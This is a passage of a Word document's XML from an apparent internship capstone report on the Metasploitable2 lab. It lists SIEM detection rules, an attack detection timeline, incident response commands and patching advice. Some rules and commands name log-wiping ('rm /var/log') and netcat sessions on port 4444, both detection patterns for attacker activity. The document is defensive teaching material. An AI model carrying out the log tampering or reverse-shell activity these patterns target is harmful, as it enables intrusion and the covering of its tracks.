          <w:ilvl w:val="1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Real-time monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05604F15" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Filebeat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7.17.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC686B5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Lightweight log shipper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AC2CC" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Log forwarding to Elasticsearch/Logstash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FB4F2" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38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Deployed on systems generating logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D818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Log Collection Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6EFB2C" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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System authentication logs (/var/log/auth.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6ACBC" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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System syslog (/var/log/syslog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D9BC4" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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Kernel logs (/var/log/kern.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D5E3B" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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Apache web server logs (/var/log/apache2/*.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B64E7D5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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Samba SMB logs (/var/log/samba/*.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EAD85" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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PostgreSQL database logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3AAA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Detection Rules Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E75CC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Rule 1: SSH Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF2564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</w:p>
    <w:p w14:paraId="2FAA6B2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Condition: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Failed_ssh_attempts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 5 in 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCD04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Severity: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F980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Action: Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E802A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Rule 2: Samba Exploitation Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BAD72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</w:p>
    <w:p w14:paraId="1ADBB64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Condition: Message contains CVE-2007-2447 indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC787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Severity: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD74FA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Action: Immediate Alert &amp; Incident Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218969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Rule 3: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456B4C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</w:p>
    <w:p w14:paraId="0D6191B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Condition: Process executed as root by non-admin user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73208B3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Severity: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288A05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Action: Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C216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Rule 4: Log Tampering Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1ACA5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</w:p>
    <w:p w14:paraId="5DD1DFA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Condition: Command contains "rm /var/log" OR "&gt; /var/log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DADE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Severity: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B86805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Action: Immediate Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7681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Rule 5: Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B623C2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</w:p>
    <w:p w14:paraId="12AAD50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Condition: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Outbound_traffic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 100 MB in 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA2E4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Severity: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D318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Action: Block &amp; Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0FD0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Attack Detection Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11100" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-99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1714"/>
        <w:gridCol w:w="2747"/>
        <w:gridCol w:w="3394"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="7DDC48D9" w14:textId="77777777" w:rsidTr="00C937F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E8B7BB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Attack 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DD833C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0069D7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Detection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E93D2A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Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="4DB252B3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E3AFCF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Port Scanning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DC5F27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0-5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3B5BE6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✅ DETECTED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413C47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Port Scan Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="1FEEB7AA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1B6DE0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Exploitation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5303D7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5-10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C7244C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✅ DETECTED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C8659B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RCE Attempt Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="041D561B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408ABC2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Privilege Escalation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B1F163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10-15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8660D7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✅ DETECTED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3E1E4D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Priv Esc Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="79DA310E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7CED06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Persistence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9DE741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15-20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BD8DFD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✅ DETECTED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FD19F9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Persistence Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="08A6C485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98F0DA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 Clearing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5CC453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20-25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E45190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✅ DETECTED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19B7A3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 Tampering Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C937F1" w:rsidRPr="00C937F1" w14:paraId="6590CC4D" w14:textId="77777777" w:rsidTr="00C937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CDCD84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Data Exfiltration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51FCB5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25-35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589358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✅ DETECTED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196DA9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1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937F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Large Transfer Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EFA92F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Overall Detection Accuracy: 95% of attack phases detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5FF20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74AD4637">
          <v:rect id="_x0000_i1049" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B795B5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Incident Response Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B22E63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Response Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA699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Step 1: Detection &amp; Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2FAE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</w:p>
    <w:p w14:paraId="6680AA1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SIEM Alert Triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B02E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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B7F7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Email Notification to SOC Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D58B0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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543C8D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Incident Ticket Auto-Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147BA6D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↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB257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Analyst Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3499575E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Step 2: Containment (0-15 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B984C4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5D27485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Block attacker IP at firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E21A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iptables -I INPUT -s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attacker_ip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-j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042E799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5FB2884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Isolate affected system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E0C33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link set eth0 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036B58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DDDD974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Kill attacker sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EBE47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pkill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-f "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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nc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.*</w:t>
      </w:r>
      <w:proofErr w:type="gram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4444"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8CBA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pkill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-f "</w:t>
      </w:r>
      <w:proofErr w:type="gram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bash.*</w:t>
      </w:r>
      <w:proofErr w:type="gram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4444"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A7DE5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DDC902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Stop vulnerable services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51924F4D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service samba </w:t>
      </w:r>
      <w:proofErr w:type="gram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stop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74F92CD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service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vsftpd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stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A153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Step 3: Eradication (15-60 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4CA20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0FF1494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Remove persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3694F4F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crontab -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87AA1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rm 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etc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systemd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/system/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persistence.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E93EFF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systemctl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daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C69D3D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2F185F3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Remove backdoor accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC8BC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userdel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-r backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A21B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C6D131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Remove SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F826BD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rm /root/.ssh/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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="096FF51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7195E7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Patch vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A24D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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E753B7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apt upgrade -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277A79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apt install --only-upgrade samba apache2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postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13641CE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Step 4: Recovery (1-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5786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06D7C60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Restore from clean backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4DB8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restore_from_backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F5AFF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A6D0FC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Verify clean state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45023FE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nmap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--script vuln localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B0E4A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rkhunter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--check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3FE04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chkrootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F8C1B3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CFD4E39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Restore user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAEA59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restore_user_data.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331282BE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82E8F6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# Return to production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40878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link set eth0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D5FAE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366BB3FA">
          <v:rect id="_x0000_i1050" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="236C4AD0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Mitigation &amp; Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7ED4A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Immediate Actions (0-7 days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B18C6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1. Critical Security Patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64DF14" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Upgrade Samba from 3.0.20 to 4.18+ (CVE-2007-2447 fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECEE600" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Upgrade Apache from 2.2.8 to 2.4.56+ (CVE-2009-0196 fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A3869" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Upgrade PostgreSQL from 8.2.5 to 14+ (CVE-2009-3697 fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32E6A4" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Remove 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vsftpd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2.3.4 or upgrade to 3.0.5+ (CVE-2011-2523 fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6FAE5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Upgrade OpenSSH to 8.8+ (CVE-2004-2761 fixes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7593EA7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2. Network Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46960DA7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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Implement firewall rules blocking SMB ports (139/445) externally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05968B6D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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Enable firewall on all systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F7A35" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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Restrict FTP access or disable FTP service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB04A7F" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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Implement ingress/egress filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26E51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3. Security Monitoring Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FA669" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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Deploy SIEM infrastructure (ELK Stack - completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FB1B5" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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Enable centralized logging on all systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2142FE" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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Configure real-time alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46140D19" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42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Set up dashboard monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47579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Short-Term Improvements (1-4 weeks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF91293" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Deploy Host-Based Intrusion Detection System (HIDS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A8ADD" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Implement File Integrity Monitoring (FIM) on critical files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE04B2" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Enable Endpoint Detection and Response (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6F44A" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Deploy Network Intrusion Prevention System (IPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48966345" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Implement Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B243C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Long-Term Strategy (1-6 months)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559FE4B" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Automate patch management system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D5DB0" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Establish 24/7 Security Operations Center (SOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FE5A1" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Conduct quarterly security assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01993047" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Implement vulnerability management program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDBEB9" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Develop security incident response playbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAC27C" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Establish data loss prevention (DLP) controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633D70D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5CE44B5F">
          <v:rect id="_x0000_i1051" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDFCE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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C8C21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This comprehensive cybersecurity assessment successfully accomplished all capstone project objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39488FC7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Identified 12 open ports wit</w:t>
      </w:r>
      <w:r w:rsidR="00B70577">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h 8+ critical vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00B70577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Achieved complete system compromise </w:t>
      </w:r>
      <w:r w:rsidR="00B70577">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through multiple attack paths</w:t>
      </w:r>
      <w:r w:rsidR="00B70577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Implemented ELK Stack SIE</w:t>
      </w:r>
      <w:r w:rsidR="00B70577">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M with 95% detection accuracy</w:t>
      </w:r>
      <w:r w:rsidR="00B70577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Developed incident response pro</w:t>
      </w:r>
      <w:r w:rsidR="00B70577">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cedures and response timeline</w:t>
      </w:r>
      <w:r w:rsidR="00B70577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Created actionable recommendations for security hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC08B34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Key Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A90F6E" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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System is critically vulnerable with immediate exploitation possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C191A7" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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Multiple attack vectors provide rapid path to system compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD9155" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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SIEM implementation successful with real-time threat detection capability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD1F4D" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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Incident response procedures documented and response-ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866BA5F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Overall Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808897B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Risk Level: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F0BA6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The Metasploitable2 system represents a deliberately vulnerable testing environment that demonstrates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBEC296" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Importance of timely security patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3BC1D1" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Value of network defense layering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58875A26" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Critical need for comprehensive security monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A3ADF" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1" w:rsidP="00C937F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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Necessity of incident response procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D15966" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00000000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pict w14:anchorId="3D2C5547">
          <v:rect id="_x0000_i1052" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F767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Assessment Completed By: Prathyusha Kale (APSPL_UID9364)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150C05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Organization: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ApexPlanet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Software Pvt. Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEE4C2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Program: Cybersecurity &amp; Ethical Hacking Internship (60 Days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CA8738" w14:textId="77777777" w:rsidR="00C937F1" w:rsidRPr="00C937F1" w:rsidRDefault="00C937F1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937F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assessment Date: 30-10-2025</w:t>
      </w:r>
